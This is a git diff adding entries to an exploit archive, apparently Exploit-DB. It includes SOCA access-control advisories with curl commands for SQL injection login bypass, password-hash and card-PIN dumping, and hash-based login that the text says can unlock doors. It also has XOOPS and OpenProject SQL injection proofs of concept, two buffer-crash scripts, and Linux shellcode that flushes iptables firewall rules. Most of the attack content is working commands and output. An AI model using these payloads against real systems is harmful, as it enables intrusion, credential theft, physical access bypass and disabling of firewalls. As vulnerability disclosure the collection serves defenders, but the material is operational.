diff --git a/exploits/multiple/dos/46837.html b/exploits/multiple/dos/46837.html
new file mode 100644
index 000000000..fe4c0599d
--- /dev/null
+++ b/exploits/multiple/dos/46837.html
@@ -0,0 +1,242 @@
+
+
+
\ No newline at end of file
diff --git a/exploits/multiple/webapps/46820.txt b/exploits/multiple/webapps/46820.txt
index 23e6c50cd..9043b15b7 100644
--- a/exploits/multiple/webapps/46820.txt
+++ b/exploits/multiple/webapps/46820.txt
@@ -1,4 +1,4 @@
-# Exploit Title: SSRF in TheHive Project Cortex <= 2.1.3
+# Exploit Title: Cortex Unshortenlink Analyzer < 1.1 - Server-Side Request Forgery
# Date: 2/26/2019
# Exploit Author: Alexandre Basquin
# Vendor Homepage: https://blog.thehive-project.org
@@ -9,12 +9,7 @@
# Exploit description
-TheHive Project Cortex version <= 2.1.3 is vulnerable to a SSRF vulnerability in the "UnshortenLink_1_0" analyzer.
-
-References:
-
-https://blog.thehive-project.org/2019/02/11/unshortenlink-ssrf-and-cortex-analyzers-1-15-2/
-
+The "UnshortenLink_1_0" analyzer used by Cortex contains an SSRF vulnerability
POC:
@@ -28,4 +23,10 @@ POC:
4. Result can be seen in the main dashboard.
-Reported to TheHive Project by Alexandre Basquin on 1/24/2019
\ No newline at end of file
+Reported to TheHive Project by Alexandre Basquin on 1/24/2019
+
+The issue has been fixed in UnshortenLink 1.1 released within Cortex-analyzers 1.15.2
+
+References:
+
+https://blog.thehive-project.org/2019/02/11/unshortenlink-ssrf-and-cortex-analyzers-1-15-2/
\ No newline at end of file
diff --git a/exploits/php/webapps/46832.txt b/exploits/php/webapps/46832.txt
new file mode 100644
index 000000000..9ac7f7c1a
--- /dev/null
+++ b/exploits/php/webapps/46832.txt
@@ -0,0 +1,92 @@
+SOCA Access Control System 180612 Information Disclosure
+
+
+Vendor: SOCA Technology Co., Ltd
+Product web page: http://www.socatech.com
+Affected version: 180612, 170000 and 141007
+
+Summary: The company's products include proximity and fingerprint access
+control system, time and attendance, electric locks, card reader and writer,
+keyless entry system and other 30 specialized products. All products are
+attractively designed with advanced technology in accordance with users'
+safety and convenience which also fitted international standard.
+
+Desc: Insecure direct object references occur when an application provides
+direct access to objects based on user-supplied input. As a result of this
+vulnerability attackers can bypass authorization and access resources and
+functionalities in the system.
+
+Tested on: Windows NT 6.1 build 7601 (Windows 7 Service Pack 1) i586
+ Windows NT 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
+ Apache/2.2.22 (Win32)
+ PHP/5.4.13
+ Firebird/InterBase DBMS
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2019-5517
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5517.php
+
+
+20.04.2018
+
+--
+
+
+Authenticated users password hash disclosure via Get_Permissions_From_DB.php:
+-----------------------------------------------------------------------------
+
+# curl -s http://10.0.0.3/Permission/Get_Permission_From_DB.php -H "Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
+
+[{"Idx":1,"Id":"USER","Password":"4a7d1ed414474e4033ac29ccb8653d9b","Access":"ffffff00ff00ffffff00"},{"Idx":2,"Id":"soca","Password":"3c0d71fab22bc8703324e06d59a81700","Access":"ffffff00ff00ffffff00"}]
+
+
+Unauthenticated users passwords (pins) disclosure via Ac10_ReadSortCard:
+------------------------------------------------------------------------
+
+# curl -X POST http://10.0.0.3/cgi-bin/Reader_Action.cgi/Ac10_ReadSortCard --data "Reader=%7B%22Idx%22%3A5%2C%22Model%22%3A502%2C%22Comm%22%3A%22TCP%2C10.0.0.3%2C4444%22%2C%22Timeout%22%3A1%2C%22SubNames%22%3A%7B%221%22%3A%22%22%2C%222%22%3A%22%22%2C%223%22%3A%22%22%2C%224%22%3A%22%22%2C%225%22%3A%22%22%2C%226%22%3A%22%22%2C%227%22%3A%22%22%2C%228%22%3A%22%22%7D%2C%22CreateTime%22%3A%222016-04-28+15%3A57%3A31%22%2C%22EditTime%22%3A%222018-12-26+17%3A14%3A37%22%2C%22Polling%22%3A1%2C%22Done%22%3Afalse%7D&Section=17" -s |grep Password |lolcat
+
+{"cmd":"readcard","success":true,"Reader":{"Idx":5,"Model":502,"SubNames":
+{"8":"","7":"","6":"","5":"","4":"","3":"","2":"","1":""},"No":1,"Polling":
+1,"EditTime":"2018-12-26 17:14:37","Name":"READER017","Done":false,"Comm":"TCP,10.0.0.3,4444",
+"Timeout":1,"CreateTime":"2016-04-28 15:57:31"},"Section":17,"Cards":[
+{"Card":"3758236739","Password":"0000","Timezone":"1"},{"Card":"3758294894","Password":"0000","Timezone":"1"},
+{"Card":"3758393748","Password":"0000","Timezone":"1"},{"Card":"3758397434","Password":"0000","Timezone":"1"},
+{"Card":"3758526944","Password":"0000","Timezone":"1"},{"Card":"3758556239","Password":"0000","Timezone":"1"},
+{"Card":"3759183323","Password":"0000","Timezone":"1"},{"Card":"3759289453","Password":"0000","Timezone":"1"},
+{"Card":"3759444892","Password":"0000","Timezone":"1"},{"Card":"3759608121","Password":"0000","Timezone":"1"},
+{"Card":"3759700024","Password":"0000","Timezone":"1"},{"Card":"3760195859","Password":"0000","Timezone":"1"},
+{"Card":"3760330834","Password":"0000","Timezone":"1"},{"Card":"3760455789","Password":"0000","Timezone":"1"},
+{"Card":"3760493498","Password":"0000","Timezone":"1"},{"Card":"3760555917","Password":"0000","Timezone":"1"},
+{"Card":"3760674062","Password":"0000","Timezone":"1"},{"Card":"3761256706","Password":"0000","Timezone":"1"},
+{"Card":"3761275358","Password":"0000","Timezone":"1"},{"Card":"3761386285","Password":"0000","Timezone":"1"},
+{"Card":"3761398620","Password":"0000","Timezone":"1"},{"Card":"3761452653","Password":"0000","Timezone":"1"},
+{"Card":"3761514319","Password":"0000","Timezone":"1"},{"Card":"3761543092","Password":"0000","Timezone":"1"},
+{"Card":"3761766657","Password":"0000","Timezone":"1"},{"Card":"3761783860","Password":"0000","Timezone":"1"},
+{"Card":"3762311449","Password":"0000","Timezone":"1"},{"Card":"3762313335","Password":"0000","Timezone":"1"},
+{"Card":"3762328203","Password":"0000","Timezone":"1"},{"Card":"3762384973","Password":"0000","Timezone":"1"},
+{"Card":"3762647673","Password":"0000","Timezone":"1"},{"Card":"3762688310","Password":"0000","Timezone":"1"},
+{"Card":"3762771467","Password":"0000","Timezone":"1"},{"Card":"3762827566","Password":"0000","Timezone":"1"},
+{"Card":"3762843960","Password":"0000","Timezone":"1"},{"Card":"3762910530","Password":"0000","Timezone":"1"},
+{"Card":"3763344650","Password":"0000","Timezone":"1"},{"Card":"3763417869","Password":"0000","Timezone":"1"},
+{"Card":"3763492897","Password":"0000","Timezone":"1"},{"Card":"3763734440","Password":"0000","Timezone":"1"},
+{"Card":"3763865189","Password":"0000","Timezone":"1"},{"Card":"3763889211","Password":"0000","Timezone":"1"},
+{"Card":"3764619719","Password":"0000","Timezone":"1"},{"Card":"3764811544","Password":"0000","Timezone":"1"},
+{"Card":"3764846862","Password":"0000","Timezone":"1"},{"Card":"3765568542","Password":"0000","Timezone":"1"},
+{"Card":"3765790491","Password":"0000","Timezone":"1"},{"Card":"3765917518","Password":"0000","Timezone":"1"},
+{"Card":"3765962614","Password":"0000","Timezone":"1"},{"Card":"3765978672","Password":"0000","Timezone":"1"},
+{"Card":"3766032648","Password":"0000","Timezone":"1"},{"Card":"3766498811","Password":"0000","Timezone":"1"},
+{"Card":"3766625241","Password":"0000","Timezone":"1"},{"Card":"3766970803","Password":"0000","Timezone":"1"},
+{"Card":"3767105946","Password":"0000","Timezone":"1"},{"Card":"3767601584","Password":"0000","Timezone":"1"},
+...
+...
+...
+
+
+phpinfo() disclosure:
+---------------------
+
+# curl -s http://10.0.0.3/phpinfo.php
\ No newline at end of file
diff --git a/exploits/php/webapps/46833.txt b/exploits/php/webapps/46833.txt
new file mode 100644
index 000000000..9ec0bf62a
--- /dev/null
+++ b/exploits/php/webapps/46833.txt
@@ -0,0 +1,137 @@
+SOCA Access Control System 180612 SQL Injection And Authentication Bypass
+
+
+Vendor: SOCA Technology Co., Ltd
+Product web page: http://www.socatech.com
+Affected version: 180612, 170000 and 141007
+
+Summary: The company's products include proximity and fingerprint access
+control system, time and attendance, electric locks, card reader and writer,
+keyless entry system and other 30 specialized products. All products are
+attractively designed with advanced technology in accordance with users'
+safety and convenience which also fitted international standard.
+
+Desc: The Soca web access control system suffers from multiple SQL Injection
+vulnerabilities. Input passed via multiple POST parameters is not properly
+sanitised before being returned to the user or used in SQL queries. This
+can be exploited to manipulate SQL queries by injecting arbitrary SQL code
+and bypass the authentication mechanism. It allows the attacker to remotely
+disclose password hashes and login with MD5 hash with highest privileges
+resulting in unlocking doors and bypass the physical access control in place.
+
+Tested on: Windows NT 6.1 build 7601 (Windows 7 Service Pack 1) i586
+ Windows NT 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
+ Apache/2.2.22 (Win32)
+ PHP/5.4.13
+ Firebird/InterBase DBMS
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2019-5519
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5519.php
+
+
+20.04.2018
+
+--
+
+
+Authentication bypass / SQL injection via pos_id POST parameter in Login.php:
+-----------------------------------------------------------------------------
+-version 141007
+
+# curl -X POST --data "pos_id=' or 1=1--&pos_pw=whatever&Lang=eng" -i\
+"http://10.0.0.4/Login/Login.php"
+
+HTTP/1.1 200 OK
+Date: Fri, 03 May 2018 13:37:25 GMT
+Server: Apache/2.2.22 (Win32) PHP/5.4.13
+X-Powered-By: PHP/5.4.13
+Set-Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 5
+Content-Type: text/html
+
+ true
+
+
+Authentication bypass / SQL injection via ID POST parameter in Login.php:
+=========================================================================
+-version 180612
+
+# curl -X POST --data "ID=' or 1=1--&PW=whatever&Lang=eng"\
+"http://10.0.0.3/Login/Login.php"
+
+{"LoginCheck":true,"Session":{"IP":"10.0.0.9","sess_Lang":"eng","sess_id":"' or 1=1--","sess_passwd":"008c5926ca861023c1d2a36653fd88e2","sess_Access":{"Reader":1,"User":1,"Card":1,"Groups":1,"Historys":1,"Special_Query":1,"Permission":1,"WorkGroup":1,"Attend":1,"WorkTime":1,"Dep":1,"Holiday":1,"ConvertHistory":1,"Backup_Database":1,"Auto_Update_Card":1,"Mail_Report":1}}}
+
+
+Authenticated SQL injection via cidx POST parameter in Card_Edit_GetJson.php:
+=============================================================================
+
+Dump current user:
+------------------
+
+# curl -X POST --data "cidx=144 and 1=(user)"\
+"http://10.0.0.3/Card/Card_Edit_GetJson.php"\
+-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
+
+Warning: ibase_fetch_assoc(): conversion error from string "SYSDBA"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17
+
+Dump table:
+-----------
+
+# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+57+distinct+rdb$relation_name+from+rdb$relation_fields)"\
+"http://10.0.0.3/Card/Card_Edit_GetJson.php"\
+-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
+
+Warning: ibase_fetch_assoc(): conversion error from string "USERS"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17
+
+Dump column:
+------------
+
+# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+2+distinct+rdb$field_name+from+rdb$relation_fields where rdb$relation_name=(select+first+1+skip+57+distinct+rdb$relation_name+from+rdb$relation_fields))"\
+"http://10.0.0.3/Card/Card_Edit_GetJson.php"\
+-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
+
+Warning: ibase_fetch_assoc(): conversion error from string "U_NAME"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17
+
+Dump column:
+------------
+
+# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+2+distinct+rdb$field_name+from+rdb$relation_fields where rdb$relation_name=(select+first+1+skip+56+distinct+rdb$relation_name+from+rdb$relation_fields))"\
+"http://10.0.0.3/Card/Card_Edit_GetJson.php"\
+-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
+
+Warning: ibase_fetch_assoc(): conversion error from string "U_PASSWORD"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17
+
+Dump username and Idx from USERS table:
+---------------------------------------
+
+# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+0+U_NAME || U_IDX+from+USERS)"\
+"http://10.0.0.3/Card/Card_Edit_GetJson.php"\
+-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
+
+Warning: ibase_fetch_assoc(): conversion error from string "USER1"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17
+
+Dump passwords from UAC table:
+------------------------------
+
+# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+0+U_PASSWORD+from+UAC)"\
+"http://10.0.0.3/Card/Card_Edit_GetJson.php"\
+-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
+
+Warning: ibase_fetch_assoc(): conversion error from string "4a7d1ed414474e4033ac29ccb8653d9b"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17
+
+
+Login with MD5:
+===============
+
+# curl -X POST --data "ID=USER&PW=4a7d1ed414474e4033ac29ccb8653d9b&Lang=eng"
+"http://10.0.0.3/Login/Login.php"\
+
+{"LoginCheck":true,"Session":{"IP":"10.0.0.9","sess_Lang":"eng","sess_id":"USER","sess_passwd":"4a7d1ed414474e4033ac29ccb8653d9b","sess_Access":{"Reader":1,"User":1,"Card":1,"Groups":1,"Historys":1,"Special_Query":1,"Permission":1,"WorkGroup":1,"Attend":1,"WorkTime":1,"Dep":1,"Holiday":1,"ConvertHistory":1,"Backup_Database":1,"Auto_Update_Card":1,"Mail_Report":1}}}
\ No newline at end of file
diff --git a/exploits/php/webapps/46834.txt b/exploits/php/webapps/46834.txt
new file mode 100644
index 000000000..467d243ef
--- /dev/null
+++ b/exploits/php/webapps/46834.txt
@@ -0,0 +1,46 @@
+SOCA Access Control System 180612 CSRF Add Admin Exploit
+
+
+Vendor: SOCA Technology Co., Ltd
+Product web page: http://www.socatech.com
+Affected version: 180612, 170000 and 141007
+
+Summary: The company's products include Proximity and Fingerprint access
+control system, Time and Attendance, Electric Locks, Card reader and writer,
+keyless entry system and other 30 specialized products. All products are
+attractively designed with advanced technology in accordance with users'
+safety and convenience which also fitted international standard.
+
+Desc: The application interface allows users to perform certain actions via
+HTTP requests without performing any validity checks to verify the requests.
+This can be exploited to perform certain actions with administrative privileges
+if a logged-in user visits a malicious web site.
+
+Tested on: Windows NT 6.1 build 7601 (Windows 7 Service Pack 1) i586
+ Windows NT 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
+ Apache/2.2.22 (Win32)
+ PHP/5.4.13
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2019-5520
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5520.php
+
+
+20.04.2018
+
+--
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/46835.txt b/exploits/php/webapps/46835.txt
new file mode 100644
index 000000000..3c22c7fc5
--- /dev/null
+++ b/exploits/php/webapps/46835.txt
@@ -0,0 +1,24 @@
+[+] Sql Injection on XOOPS CMS v.2.5.9
+
+[+] Date: 12/05/2019
+
+[+] Risk: High
+
+[+] CWE Number : CWE-89
+
+[+] Author: Felipe Andrian Peixoto
+
+[+] Vendor Homepage: https://xoops.org/
+
+[+] Contact: felipe_andrian@hotmail.com
+
+[+] Tested on: Windows 7 and Gnu/Linux
+
+[+] Dork: inurl:gerar_pdf.php inurl:modules // use your brain ;)
+
+[+] Exploit :
+
+ http://host/patch/modules/patch/gerar_pdf.php?cid= [SQL Injection]
+
+
+[+] EOF
\ No newline at end of file
diff --git a/exploits/php/webapps/46838.txt b/exploits/php/webapps/46838.txt
new file mode 100644
index 000000000..5b2028025
--- /dev/null
+++ b/exploits/php/webapps/46838.txt
@@ -0,0 +1,118 @@
+SEC Consult Vulnerability Lab Security Advisory < 20190510-0 >
+=======================================================================
+ title: Unauthenticated SQL Injection vulnerability
+ product: OpenProject
+ vulnerable version: 5.0.0 - 8.3.1
+ fixed version: 8.3.2 & 9.0.0
+ CVE number: CVE-2019-11600
+ impact: Critical
+ homepage: https://www.openproject.org
+ found: 2019-04-17
+ by: T. Soo (Office Bangkok)
+ SEC Consult Vulnerability Lab
+
+ An integrated part of SEC Consult
+ Europe | Asia | North America
+
+ https://www.sec-consult.com
+
+=======================================================================
+
+Vendor description:
+-------------------
+"OpenProject is the leading open source project management software.
+Support your project management process along the entire project
+life cycle: From project initiation to closure."
+
+Source: https://www.openproject.org/
+
+
+Business recommendation:
+------------------------
+The vendor provides a patch which should be applied immediately.
+
+An in-depth security analysis performed by security professionals is
+highly advised, as the software may be affected from further security issues.
+
+
+Vulnerability overview/description:
+-----------------------------------
+An SQL injection vulnerability has been identified in the web "activities API".
+An unauthenticated attacker could successfully perform an attack to extract
+potentially sensitive information from the database if OpenProject is configured
+not to require authentication for API access.
+
+
+Proof of concept:
+-----------------
+Requesting the following URL will trigger a time delay as a proof of concept
+for exploiting the blind SQL injection:
+http:///api/v3/activities/1)%20AND%203281%3d(SELECT%203281%20FROM%20PG_SLEEP(1))%20AND%20(7777%3d7777
+
+
+Vulnerable / tested versions:
+-----------------------------
+The vulnerability has been identified in OpenProject version 8.3.1 which
+was the most current version at the time of discovery.
+
+According to the vendor all versions between 5.0.0 and 8.3.1 are affected.
+Older versions (< 5.0.0) are not vulnerable.
+
+
+Vendor contact timeline:
+------------------------
+2019-04-30: Contacting vendor through security@openproject.com
+2019-04-30: A patch is published in version 8.3.2
+2019-05-06: Vendor publishes further details
+2019-05-10: Release of security advisory
+
+
+Solution:
+---------
+The vendor provides a patched version 8.3.2 and a security notice with further
+information:
+
+https://www.openproject.org/release-notes/openproject-8-3-2
+https://groups.google.com/forum/#!msg/openproject-security/XlucAJMxmzM/hESpOaFVAwAJ
+
+
+Workaround:
+-----------
+None
+
+
+Advisory URL:
+-------------
+https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+SEC Consult Vulnerability Lab
+
+SEC Consult
+Europe | Asia | North America
+
+About SEC Consult Vulnerability Lab
+The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
+ensures the continued knowledge gain of SEC Consult in the field of network
+and application security to stay ahead of the attacker. The SEC Consult
+Vulnerability Lab supports high-quality penetration testing and the evaluation
+of new offensive and defensive technologies for our customers. Hence our
+customers obtain the most current information about vulnerabilities and valid
+recommendation about the risk profile of new technologies.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Interested to work with the experts of SEC Consult?
+Send us your application https://www.sec-consult.com/en/career/index.html
+
+Interested in improving your cyber security with the experts of SEC Consult?
+Contact our local offices https://www.sec-consult.com/en/contact/index.html
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Mail: research at sec-consult dot com
+Web: https://www.sec-consult.com
+Blog: http://blog.sec-consult.com
+Twitter: https://twitter.com/sec_consult
+
+EOF Thanaphon Soo / @2019
\ No newline at end of file
diff --git a/exploits/windows/dos/46830.py b/exploits/windows/dos/46830.py
new file mode 100755
index 000000000..70b49220c
--- /dev/null
+++ b/exploits/windows/dos/46830.py
@@ -0,0 +1,22 @@
+#Exploit Title: SpotMSN 2.4.6 - 'Name/Key' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-12
+#Vendor Homepage: www.nsauditor.com
+#Software Link: http://www.nsauditor.com/downloads/spotmsn_setup.exe
+#Tested Version: 2.4.6
+#Tested on: Windows Windows 10 Single Language x64 / 7 x64 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: SpotMSN_2.4.6.py
+#2.- Open SpotMSN.txt and copy content to clipboard
+#3.- Open SpotMSN
+#4.- Select "Register" > "Enter Registration Code..."
+#5.- In "Name/Key" paste Clipboard
+#6.- Click "Ok"
+#7.- Crarshed
+
+cod = "\x41" * 300
+
+f = open('SpotMSN.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46831.py b/exploits/windows/dos/46831.py
new file mode 100755
index 000000000..7156e9c1a
--- /dev/null
+++ b/exploits/windows/dos/46831.py
@@ -0,0 +1,22 @@
+#Exploit Title: DNSS Domain Name Search Software 2.1.8 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-12
+#Vendor Homepage: www.nsauditor.com
+#Software Link: http://www.nsauditor.com/downloads/dnss_setup.exe
+#Tested Version: 2.1.8
+#Tested on: Windows Windows 10 Single Language x64 / 7 x64 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: DNSS_2.1.8.py
+#2.- Open DNSS.txt and copy content to clipboard
+#3.- Open Dnss
+#4.- Select "Register" > "Enter Registration Code..."
+#5.- In "Name/Key" paste Clipboard
+#6.- Click "Ok"
+#7.- Crarshed
+
+cod = "\x41" * 300
+
+f = open('DNSS.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 7e9706243..3dc6fb404 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6419,6 +6419,9 @@ id,file,description,date,author,type,platform,port
46822,exploits/windows/dos/46822.py,"SpotPaltalk 1.1.5 - Denial of Service (PoC)",2019-05-10,"Alejandra Sánchez",dos,windows,
46823,exploits/windows/dos/46823.py,"ASPRunner.NET 10.1 - Denial of Service (PoC)",2019-05-10,"Victor Mondragón",dos,windows,
46824,exploits/windows/dos/46824.py,"PHPRunner 10.1 - Denial of Service (PoC)",2019-05-10,"Victor Mondragón",dos,windows,
+46830,exploits/windows/dos/46830.py,"SpotMSN 2.4.6 - Denial of Service (PoC)",2019-05-13,"Victor Mondragón",dos,windows,
+46831,exploits/windows/dos/46831.py,"DNSS 2.1.8 - Denial of Service (PoC)",2019-05-13,"Victor Mondragón",dos,windows,
+46837,exploits/multiple/dos/46837.html,"Google Chrome V8 - Turbofan JSCallReducer::ReduceArrayIndexOfIncludes Out-of-Bounds Read/Write",2019-05-13,"Google Security Research",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -41250,8 +41253,13 @@ id,file,description,date,author,type,platform,port
46804,exploits/multiple/webapps/46804.txt,"Prinect Archive System 2015 Release 2.6 - Cross-Site Scripting",2019-05-07,alt3kx,webapps,multiple,80
46811,exploits/linux/webapps/46811.txt,"NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass",2019-05-08,MobileNetworkSecurity,webapps,linux,
46815,exploits/php/webapps/46815.txt,"Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting",2019-05-09,"Ibrahim Raafat",webapps,php,
-46820,exploits/multiple/webapps/46820.txt,"TheHive Project Cortex < 1.15.2 - Server-Side Request Forgery",2019-05-10,"Alexandre Basquin",webapps,multiple,
+46820,exploits/multiple/webapps/46820.txt,"Cortex Unshortenlink Analyzer < 1.1 - Server-Side Request Forgery",2019-05-10,"Alexandre Basquin",webapps,multiple,
46825,exploits/jsp/webapps/46825.txt,"dotCMS 5.1.1 - HTML Injection",2019-05-10,"Ismail Tasdelen",webapps,jsp,
46826,exploits/hardware/webapps/46826.txt,"RICOH SP 4510DN Printer - HTML Injection",2019-05-10,"Ismail Tasdelen",webapps,hardware,
46827,exploits/hardware/webapps/46827.txt,"RICOH SP 4520DN Printer - HTML Injection",2019-05-10,"Ismail Tasdelen",webapps,hardware,
46828,exploits/multiple/webapps/46828.txt,"CyberArk Enterprise Password Vault 10.7 - XML External Entity Injection",2019-05-10,"Marcelo Toran",webapps,multiple,
+46832,exploits/php/webapps/46832.txt,"SOCA Access Control System 180612 - Information Disclosure",2019-05-13,LiquidWorm,webapps,php,
+46833,exploits/php/webapps/46833.txt,"SOCA Access Control System 180612 - SQL Injection",2019-05-13,LiquidWorm,webapps,php,80
+46834,exploits/php/webapps/46834.txt,"SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin)",2019-05-13,LiquidWorm,webapps,php,
+46835,exploits/php/webapps/46835.txt,"XOOPS 2.5.9 - SQL Injection",2019-05-13,"felipe andrian",webapps,php,80
+46838,exploits/php/webapps/46838.txt,"OpenProject 5.0.0 - 8.3.1 - SQL Injection",2019-05-13,"SEC Consult",webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index f3f795aff..958f46a00 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -964,3 +964,4 @@ id,file,description,date,author,type,platform
46800,shellcodes/generator/46800.txt,"Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes)",2019-05-06,"Xavi Beltran",shellcode,generator
46801,shellcodes/linux_x86/46801.txt,"Linux/x86 - shred file Shellcode (72 bytes)",2019-05-06,strider,shellcode,linux_x86
46809,shellcodes/linux_x86/46809.c,"Linux/x86 - execve /bin/sh Shellcode (20 bytes)",2019-05-08,Rajvardhan,shellcode,linux_x86
+46829,shellcodes/linux_x86/46829.c,"Linux/x86 - /sbin/iptables -F Shellcode (43 bytes)",2019-05-13,"Xavi Beltran",shellcode,linux_x86
diff --git a/shellcodes/linux_x86/46829.c b/shellcodes/linux_x86/46829.c
new file mode 100644
index 000000000..3d5d97401
--- /dev/null
+++ b/shellcodes/linux_x86/46829.c
@@ -0,0 +1,52 @@
+# Title: Linux/x86 - /sbin/iptables -F Shellcode (43 bytes)
+# Author: Xavi Beltran
+# Date: 11/05/2019
+# Contact: xavibeltran@protonmail.com
+# Webpage: https://xavibel.com
+# Purpose: flush iptables rules
+# Tested On: Ubuntu 3.5.0-17-generic
+# Arch: x86
+# Size: 43 bytes
+
+#################################### iptables-flush.nasm ####################################
+
+global _start
+
+section .text
+_start:
+ xor eax, eax
+ push eax
+ push word 0x462d
+ mov esi, esp
+ push eax
+ push dword 0x73656c62
+ push dword 0x61747069
+ mov edi,esp
+ push dword 0x2f2f6e69
+ push dword 0x62732f2f
+ mov ebx, esp
+ push eax
+ push esi
+ push edi
+ mov ecx, esp
+ mov al, 11
+ int 0x80
+
+####################################### shellcode.c #######################################
+
+#include
+#include
+
+unsigned char code[] = \
+"\x31\xc0\x50\x66\x68\x2d\x46\x89\xe6\x50\x68\x62\x6c\x65\x73\x68\x69\x70\x74\x61\x89\xe7\x68\x69\x6e\x2f\x2f\x68\x2f\x2f\x73\x62\x89\xe3\x50\x56\x57\x89\xe1\xb0\x0b\xcd\x80";
+
+main()
+{
+
+ printf("Shellcode Length: %d\n", strlen(code));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+
+}
\ No newline at end of file